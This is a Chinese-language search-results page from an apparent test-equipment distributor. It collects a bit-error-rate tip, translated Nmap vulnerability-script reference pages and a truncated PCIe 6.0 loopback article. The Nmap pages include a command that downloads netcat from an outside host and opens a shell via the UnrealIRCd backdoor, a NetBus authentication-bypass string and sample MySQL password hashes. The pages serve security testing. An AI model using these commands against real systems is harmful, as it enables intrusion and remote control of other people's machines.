top of page

搜尋結果

以空白搜尋找到 386 個結果

  • 【Tech Tip】位元錯誤率(BER)的迷思

    實現包含 400GbE 及更高乙太網路速率的現代高速鏈路皆使用 PAM-4 電子調變。 這種調變格式允許介面以 400GbE 及以上所需的速度運行,但 PAM-4 調變更容易受到雜訊和訊號完整性的影響。 透過使用整合到乙太網路堆疊中的前向糾錯(FEC)編碼,可以緩解這一問題。 即使使用 FEC,了解連結中的所有錯誤也至關重要,因為有些錯誤可能表示產品效能不佳,甚至存在重大設計缺陷。 傳統的測試設備可以計算位元錯誤,但無法深入了解錯誤的性質。 工程師只能盲目地排除故障,並努力了解真正的問題,甚至可能完全錯過一個基本的設計缺陷。 VIAVI 開發了全面的整合工具集,可清楚顯示錯誤的嚴重程度並深入了解其性質,從而幫助工程師更快地解決問題。 為什麼BER沒有幫助 誤碼率是一種粗略的測量方法。 它基本上告訴你在一個時間間隔內有多少位元出錯。 即使具有精細的時間粒度,您仍然可以看到數十億位元,而基本誤碼率 (BER) 並不能幫助您了解錯誤是如何分佈的,以及它們是否真的值得關注。 首先要查看每個碼字(codeword) 的 FEC 錯誤符號(symbols)。 下面兩個範例是在裝置上產生的,當使用傳統誤碼率測試儀(BERT)進行測試時,得到了非常相似結果。 但在使用 VIAVI ONT-800 FEC 錯誤符號視圖進行檢查時,會出現截然不同的情況。 範例1 (左) : 良好的FEC尾端,每個Codeword的Symbol Error快速下降 範例2 (右) : 壞的FEC尾端,尾部較長,導致無法校正的Codeword和掉包 上面兩張截圖的誤碼率大致相同。 簡單的 BERT 不會顯示這兩種情況之間的任何顯著差異,若只透過簡單的通過/失敗閾值將會讓使用者使用到不良的產品零件! VIAVI 提供的關鍵視圖資訊清楚呈現每個Codeword的Symbol Error。 這個視圖呈現的尾部長度和形狀可以迅速為有經驗的工程師提供大量資訊。 Symbol Error在5 階以上(經過合理的運行時間後),如果尾部較短(接近0錯誤,遠離15階),且誤碼符號迅速遞減下降到零,則不需要太大地關注,但如果尾部較長(遠離0錯誤,接近甚至多於15階),且不是快速遞減方式,則必須進一步調查 。 下一階段是了解範例 2 為什麼會出現如此多的錯誤符號。 VIAVI ONT 系列提供了幾種獨特的工具來研究這個問題。 ONT 可以追蹤錯誤輪廓,偵測錯誤突發(Bursts)和位元滑移(Bit Slips)--這是造成 "壞的" FEC尾端的潛在原因。 RX 位元滑移分析視圖可快速識別多個邏輯通道出現嚴重位元滑移的問題。 這將導致我們在案範例2 中看到的不良 FEC 尾端。 設計人員就可以做出適當的更改(這可能包括更改 TX 均衡器設定和更新 DSP 韌體)。 為了進一步確保設計的穩健性,使用者可以使用 ONT 動態偏移(Dynamic Skew)功能對連結施加壓力。 這將最大限度地提高串擾(Crosstalk)發生的幾率,並對基於 DSP 的現代 CDR 和均衡器施加壓力,以確保它們有足夠的工作餘裕。 即時且完整的錯誤識別 如果沒有正確的洞察力,僅依靠簡單的誤碼率,就會忽略現代高速乙太網路積體電路、模組和系統的重大問題。 只有能快速呈現出錯誤輪廓的影響並深入了解錯誤指紋(error fingerprint) 的視圖,才能對基於 PAM-4 的介面有所幫助。 VIAVI ONT 系列整合了所有這些功能,可協助驗證和偵錯 PAM-4,防止您被位元錯誤迷惑! 延伸閱讀 匯流排協定測試解決方案總覽 > 瀏覽 VIAVI Solutions 所有技術文章 > 翔宇科技代理了各種匯流排協定測試解決方案,包括:PCIe、NVMe、CXL、Serial Attached SCSI、Serial ATA、Fibre Channel、Ethernet、MIPI M-PHY、 UniPro、UFS、A-PHY、I3C、USB、CAN、I2C、SPI、eSPI 等測試工具。

  • Nmap vulns 指令與參數:netbus-auth-bypass 檢查NetBus服務器是否存在一種身份驗證繞過漏洞

    指令類型:portrule 類別:auth, safe, vuln 下載:https://svn.nmap.org/nmap/scripts/netbus-auth-bypass.nse 指令摘要 檢查NetBus服務器是否存在一種身份驗證繞過漏洞,該漏洞允許在不知道密碼的情況下完全訪問。 例如,一個運行在本地主機TCP端口12345上且有此漏洞的服務器對任何人都是可訪問的。攻擊者可以簡單地與服務器建立連接(ncat -C 127.0.0.1 12345),並通過在控制台輸入Password;1;來登入服務。 另見: netbus-brute.nse 指令範例 nmap -p 12345 --script netbus-auth-bypass 指令輸出 12345/tcp open netbus |_netbus-auth-bypass: Vulnerable 作者: Toni Ruottu License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:mysql-vuln-cve2012-2122 偵測繞過 MySQL 和 MariaDB身份認證的漏洞

    指令類型:portrule 類別:discovery, intrusive, vuln 下載:https://svn.nmap.org/nmap/scripts/mysql-vuln-cve2012-2122.nse 指令摘要 嘗試利用 CVE2012-2122 漏洞繞過 MySQL 和 MariaDB 服務器的身份驗證。如果它易受攻擊,腳本還將嘗試傾倒 MySQL 用戶名和密碼雜湊。 所有 MariaDB 和 MySQL 版本直到 5.1.61、5.2.11、5.3.5、5.5.22 都是易受攻擊的,但利用這個漏洞是否成功取決於 memcmp() 是否返回 -128..127 範圍外的任意整數。 "當用戶連接到 MariaDB/MySQL 時,會計算一個令牌(SHA 過一個密碼和一個隨機攪亂字符串),並與預期值進行比較。由於不正確的類型轉換,可能會發生令牌和預期值被認為是相等的情況,即使 memcmp() 返回非零值。在這種情況下,MySQL/MariaDB 會認為密碼是正確的,即使它不是。因為該協議使用隨機字符串,觸發此錯誤的概率大約是 1/256。這意味著,如果知道一個用戶名來連接(而且“root”幾乎總是存在的),她可以通過重複連接嘗試使用任何密碼連接。大約 300 次嘗試只需要不到一秒的時間,所以基本上賬戶密碼保護幾乎等於不存在。” 原始公開通告: http://seclists.org/oss-sec/2012/q2/493 關於這個漏洞的有趣帖子: https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql 指令參數 mysql-vuln-cve2012-2122.pass MySQL 密碼。預設:nmapFTW。 mysql-vuln-cve2012-2122.user MySQL 用戶名。預設:root。 mysql-vuln-cve2012-2122.iterations 連接重試次數。預設:1500。 mysql-vuln-cve2012-2122.socket_timeout 套接字超時時間。預設:5秒。 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 指令範例 nmap -p3306 --script mysql-vuln-cve2012-2122 nmap -sV --script mysql-vuln-cve2012-2122 指令輸出 PORT STATE SERVICE REASON 3306/tcp open mysql syn-ack | mysql-vuln-cve2012-2122: | VULNERABLE: | Authentication bypass in MySQL servers. | State: VULNERABLE | IDs: CVE:CVE-2012-2122 | Description: | When a user connects to MariaDB/MySQL, a token (SHA | over a password and a random scramble string) is calculated and compared | with the expected value. Because of incorrect casting, it might've | happened that the token and the expected value were considered equal, | even if the memcmp() returned a non-zero value. In this case | MySQL/MariaDB would think that the password is correct, even while it is | not. Because the protocol uses random strings, the probability of | hitting this bug is about 1/256. | Which means, if one knows a user name to connect (and "root" almost | always exists), she can connect using *any* password by repeating | connection attempts. ~300 attempts takes only a fraction of second, so | basically account password protection is as good as nonexistent. | | Disclosure date: 2012-06-9 | Extra information: | Server granted access at iteration #204 | root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11 | debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF | phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11 | References: | https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql | http://seclists.org/oss-sec/2012/q2/493 |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122 作者: Paulino Calderon License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:irc-unrealircd-backdoor 檢查 IRC 伺服器是否被植入後門

    指令類型:portrule 類別:exploit, intrusive, malware, vuln 下載:https://svn.nmap.org/nmap/scripts/irc-unrealircd-backdoor.nse 指令摘要 檢查 IRC 伺服器是否被植入後門,方法是執行基於時間的命令(ping)並檢查響應時間。 irc-unrealircd-backdoor.command 腳本參數可以用來在遠端系統上執行任意命令。由於這種漏洞的特性(命令的輸出永遠不會返回),我們無法獲得命令的輸出。然而,它可以用來啟動 netcat 監聽器,如下所示: $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' $ ncat -vv localhost 4444 Ncat: Version 5.30BETA1 ( https://nmap.org/ncat ) Ncat: Connected to 127.0.0.1:4444. pwd /home/ron/downloads/Unreal3.2-bad whoami ron Metasploit 也可用於利用這個漏洞。 除了執行任意命令外,還可以傳遞 irc-unrealircd-backdoor.kill 腳本參數,該參數僅用於終止 UnrealIRCd 進程。 參考資料: http://seclists.org/fulldisclosure/2010/Jun/277 http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt http://www.metasploit.com/modules/exploit/unix/irc/unreal_ircd_3281_backdoor 指令參數 irc-unrealircd-backdoor.kill 如果設置為 1 或 true,則終止運行中的被後門感染的 UnrealIRCd。 irc-unrealircd-backdoor.wait 在執行檢查前等待的時間(秒)。建議設置這個參數以進行更可靠的檢查(100 是一個好值)。 irc-unrealircd-backdoor.command 在遠端系統上運行的任意命令(注意,您將看不到命令的輸出)。即使主機不易受攻擊,也將始終嘗試這種方法。模式 %IP% 將被替換為目標主機的 IP 地址。 指令範例 nmap -sV --script=irc-unrealircd-backdoor 指令輸出 PORT STATE SERVICE 6667/tcp open irc |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277 作者: Vlatko Kosturjak Ron Bowes License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:irc-botnet-channels 檢查 IRC 伺服器是否有惡意機器人網路常用的頻道

    指令類型:portrule 類別:discovery, vuln, safe 下載:https://svn.nmap.org/nmap/scripts/irc-botnet-channels.nse 指令摘要 檢查 IRC 伺服器是否有惡意機器人網路常用的頻道。 使用 irc-botnet-channels.channels 腳本參數來控制頻道名稱列表。預設的頻道列表包括: loic Agobot Slackbot Mytob Rbot SdBot poebot IRCBot VanBot MPack Storm GTbot Spybot Phatbot Wargbot RxBot 指令參數 irc-botnet-channels.channels 要檢查的頻道名稱列表。 指令範例 nmap -p 6667 --script=irc-botnet-channels nmap -p 6667 --script=irc-botnet-channels --script-args 'irc-botnet-channels.channels={chan1,chan2,chan3}' 指令輸出 irc-botnet-channels: | #loic |_ #RxBot 作者: David Fifield Ange Gutek License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:ipmi-cipher-zero 偵測IPMI 2.0 密碼零認證繞過掃描器的漏洞

    指令類型:portrule 類別:vuln, safe 下載:https://svn.nmap.org/nmap/scripts/ipmi-cipher-zero.nse 指令摘要 IPMI 2.0 密碼零認證繞過掃描器。此模塊識別兼容 IPMI 2.0 的系統,這些系統容易通過使用密碼零來繞過認證漏洞。 指令參數 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 指令範例 nmap -sU --script ipmi-cipher-zero -p 623 指令輸出 PORT STATE SERVICE REASON 623/udp open|filtered unknown no-response | ipmi-cipher-zero: | VULNERABLE: | IPMI 2.0 RAKP Cipher Zero Authentication Bypass | State: VULNERABLE | Risk factor: High | Description: | | The issue is due to the vendor shipping their devices with the | cipher suite '0' (aka 'cipher zero') enabled. This allows a | remote attacker to authenticate to the IPMI interface using | an arbitrary password. The only information required is a valid | account, but most vendors ship with a default 'admin' account. | This would allow an attacker to have full control over the IPMI | functionality. | | References: | http://fish2.com/ipmi/cipherzero.html |_ https://www.us-cert.gov/ncas/alerts/TA13-207A 作者: Claudiu Perta License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:http-wordpress-users 列舉 Wordpress 博客/CMS 安裝中的用戶名稱

    指令類型:portrule 類別:auth, intrusive, vuln 下載:https://svn.nmap.org/nmap/scripts/http-wordpress-users.nse 指令摘要 通過利用存在於 2.6、3.1、3.1.1、3.1.3 和 3.2-beta2 版本(可能還有其他版本)的資訊洩露漏洞,列舉 Wordpress 博客/CMS 安裝中的用戶名稱。 原始安全顧問通報: http://www.talsoft.com.ar/site/research/security-advisories/wordpress-user-id-and-user-name-disclosure/ 指令參數 http-wordpress-users.out 如果設定,將用戶名列表保存在此文件中。 http-wordpress-users.basepath Wordpress 的基礎路徑。預設為:/ http-wordpress-users.limit ID 搜索的上限。預設為:25 slaxml.debug 請參閱 slaxml 函式庫的文檔。 http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent 請參閱 http 函式庫的文檔。 smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 請參閱 smbauth 函式庫的文檔。 指令範例 nmap -p80 --script http-wordpress-users nmap -sV --script http-wordpress-users --script-args limit=50 指令輸出 PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-wordpress-users: | Username found: admin | Username found: mauricio | Username found: cesar | Username found: lean | Username found: alex | Username found: ricardo |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' 作者: Paulino Calderon License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:http-vuln-misfortune-cookie 偵測 RomPager 4.07 CVE-2014-9222漏洞

    指令類型:portrule 類別:vuln, intrusive 下載:https://svn.nmap.org/nmap/scripts/http-vuln-misfortune-cookie.nse 指令摘要 偵測 RomPager 4.07 CVE-2014-9222不幸餅乾漏洞,並安全地利用它。 另見: http-vuln-cve2013-6786.nse 指令參數 slaxml.debug 請參閱 slaxml 函式庫的文檔。 http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent 請參閱 http 函式庫的文檔。 smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 請參閱 smbauth 函式庫的文檔。 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 指令範例 nmap -p 7547 --script=http-vuln-misfortune-cookie 指令輸出 PORT STATE SERVICE REASON 7547/tcp open unknown syn-ack | http-vuln-misfortune-cookie: | VULNERABLE: | RomPager 4.07 Misfortune Cookie | State: VULNERABLE | IDs: BID:71744 CVE:CVE-2014-9222 | Description: | The cookie handling routines in RomPager 4.07 are vulnerable to remote code | execution. This script has verified the vulnerability by exploiting the web | server in a safe manner. | References: | http://www.kb.cert.org/vuls/id/561444 | http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222 | http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html |_ http://www.securityfocus.com/bid/71744 作者: Andrew Orr License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:http-vuln-wnr1000-creds 偵測WNR 1000 系列中一個漏洞

    指令類型:portrule 類別:exploit, vuln, intrusive 下載:https://svn.nmap.org/nmap/scripts/http-vuln-wnr1000-creds.nse 指令摘要 在 WNR 1000 系列中發現了一個漏洞,該漏洞允許攻擊者通過路由器界面檢索管理員憑證。已在固件版本 V1.0.2.60_60.0.86(最新)和 V1.0.2.54_60.0.82NA 上進行測試。 漏洞由 c1ph04 發現。 指令參數 http-vuln-wnr1000-creds.uri 可以找到 passwordrecovered.cgi 腳本的 URI 路徑。默認為:/ creds.[service], creds.global 請參閱 creds 函式庫的文檔。 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 slaxml.debug 請參閱 slaxml 函式庫的文檔。 smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 請參閱 smbauth 函式庫的文檔。 http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent 請參閱 http 函式庫的文檔。 指令範例 nmap -sV --script http-vuln-wnr1000-creds -p80 指令輸出 PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-vuln-wnr1000-creds: | VULNERABLE: | Netgear WNR1000v3 Credential Harvesting Exploit | State: VULNERABLE (Exploitable) | IDs: None, 0-day | Description: | A vulnerability has been discovered in WNR 1000 series that allows an attacker | to retrieve administrator credentials with the router interface. | Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA | Disclosure date: 26-01-2014 | References: |_ http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip 作者: Paul AMAR Rob Nicholls License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:http-vuln-cve2017-5689 偵測英特爾主動管理技術的漏洞

    指令類型:portrule 類別:vuln, auth, exploit 下載:https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5689.nse 指令摘要 偵測具有英特爾主動管理技術的系統是否容易受到 INTEL-SA-00075 特權提升漏洞 (CVE2017-5689) 的影響。 此腳本通過嘗試執行帶有空白回應參數的摘要認證來確定目標是否易受攻擊。如果認證成功,則會收到 HTTP 200 回應。 參考資料: https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability 指令參數 slaxml.debug 請參閱 slaxml 函式庫的文檔。 http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent 請參閱 http 函式庫的文檔。 smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 請參閱 smbauth 函式庫的文檔。 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 指令範例 nmap -p 16992 --script http-vuln-cve2017-5689 指令輸出 PORT STATE SERVICE REASON 16992/tcp open amt-soap-http syn-ack | http-vuln-cve2017-5689: | VULNERABLE: | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass | State: VULNERABLE | IDs: CVE:CVE-2017-5689 BID:98269 | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C) | Intel Active Management Technology is vulnerable to an authentication bypass that | can be exploited by performing digest authentication and sending a blank response | digest parameter. | | Disclosure date: 2017-05-01 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689 | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr | http://www.securityfocus.com/bid/98269 | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability Requires 作者: Andrew Orr License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • Nmap vulns 指令與參數:http-vuln-cve2017-8917 偵測Joomla! 3.7.x 至 3.7.1 之前版本的 SQL 注入漏洞

    指令類型:portrule 類別:vuln, intrusive 下載:https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-8917.nse 指令摘要 影響 Joomla! 3.7.x 至 3.7.1 之前版本的 SQL 注入漏洞,允許未經認證的使用者執行任意 SQL 命令。這個漏洞是由一個新組件 com_fields 引起的,該組件在 3.7 版本中首次引入。此組件可公開訪問,意味著任何訪問網站的惡意個體都可以利用這個漏洞。 該腳本嘗試注入一個 SQL 語句,該語句在目標網站上運行 user() 資訊函數。成功的注入將在 extra_info 表中返回當前 MySQL 用戶名和主機名。 這個腳本基於由 brianwrf 編寫的 Python 腳本。 參考資料: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917 指令參數 http-vuln-cve2017-8917.uri Joomla 安裝的網站根目錄 slaxml.debug 請參閱 slaxml 函式庫的文檔。 http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent 請參閱 http 函式庫的文檔。 smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 請參閱 smbauth 函式庫的文檔。 vulns.short, vulns.showall 請參閱 vulns 函式庫的文檔。 指令範例 nmap --script http-vuln-cve2017-8917 -p 80 nmap --script http-vuln-cve2017-8917 --script-args http-vuln-cve2017-8917.uri=joomla/ -p 80 指令輸出 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-vuln-cve2017-8917: | VULNERABLE: | Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2017-8917 | Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) | An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers | to execute aribitrary SQL commands via unspecified vectors. | | Disclosure date: 2017-05-17 | Extra information: | User: root@localhost | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917 |_ https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html 作者: Wong Wai Tuck License: Same as Nmap--See https://nmap.org/book/man-legal.html 隨選即看研討會 網路安全技術研討會 | 探索 CyberScope 全面站點滲透測試 延伸閱讀 NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。 瀏覽 Nmap 函示庫與指令 > 瀏覽 NetAlly 網路測試技術文章 >

  • 【產業動態】揭密 PCIe 6.0 環回(Loopback)和數位近端(Digital Near-End)環回功能

    在 PCIe 通道和鏈結中進行測試與故障隔離的關鍵機制。 PCIe 規範給出了一種名為 "環回(Loopback) "的LTSSM狀態,用於測試和故障隔離。 基本上,它提供了一種機制,包含循環返回在Loopback LTSSM 狀態下接收到的資料。 該機制指定了進入和退出行為,所有其他細節則根據具體實現而定。 Loopback可在每個通道或配置的鏈路基礎上運作。 PCIe 6.0 規範臨時定義了以下術語: Loopback Lead 是請求 Loopback 的組件 Loopback Follower是環回資料(Loopback Data)的組件 進入Loopback LTSSM 狀態 根據 PCIe 6.0 規範,只要連續收到兩個設定了環回位(Loopback bit)的TS1有序集(Ordered Sets),環回跟隨器設備(Loopback Follower device)就會進入環回狀態。 根據編碼方式,Loopback bit的編碼如下: 在 8b/10b 和 128b/130b 編碼中,Loopback使用 TS1 和 TS2 Ordered Sets的訓練控製字段中的位2(Loopback) 在 1b/1b 編碼中,Loopback 使用 TS1 和 TS2 Ordered Sets的訓練控製字段中的位 3:0編碼 數位近端環回 (Digital Near-End Loopback , DNELB)簡介 PIPE6.0 定義了一項名為DNELB的新功能,透過在Loopback模式下進行功能測試來切換訊號,從而促進 HVM 測試。 它引入了用於環回資料的路徑,如 PIPE 介面的 LB0、LB1、LB2、LB3、LB4 和 LB5,以及 SerDes 介面的 LB0、LB3、LB4 和 LB5。 根據Controller或 MAC 選擇的路徑,PHY 將在 NELB 模式下進行訓練。 一旦LTSSM狀態協商進入Loopback LTSSM 狀態,MAC 將在 PHY NELB 控制暫存器中寫入所需的位置並啟用設定。 然後,在收到所需的確認後,MAC 就可以自由地訓練 NELB。 當 MAC 清除 PHY NELB 控制暫存器中的啟用位元時,就完成了 NELB 的退出,一旦收到所需的確認,MAC 就可以進行正常操作。 作者 : SABNAM SAHOO 原文網址 : semiengineering.com VIAVI PCIe 6 測試解決方案包括: Xgig 6P16 PCI Express 6.0/CXL/ NVMe 協定分析/驗證平台 VIAVI Xgig® 6P16 為 16 通道的 PCIe 6.0 協定分析/驗證平台,為 Xgig PCIe 系列引入下一代 64 GT/s 高速測試能力,提供精確可重複控制,適用於深入的協定通訊問題分析和故障排除;其支援 PCIe FLIT 模式、非 FLIT 模式、CXL和NVMe,協定訓練器可模擬來源端 (RC 或 Host) 或目的端 (EP 或 Device) 設備操作,允許即時定義、傳輸和修改序列;6P16 可對狀態機進行驗證和除錯,並可透過編程生成非符合 PCIe 標準的資料序列,進行邊界和壓力條件測試,提供深度性能分析。 了解更多 > Xgig 6P4 PCI Express 6.0 / CXL / NVMe 訊號發送驗證卡 VIAVI PCIe 6.0驗證卡 (Exerciser 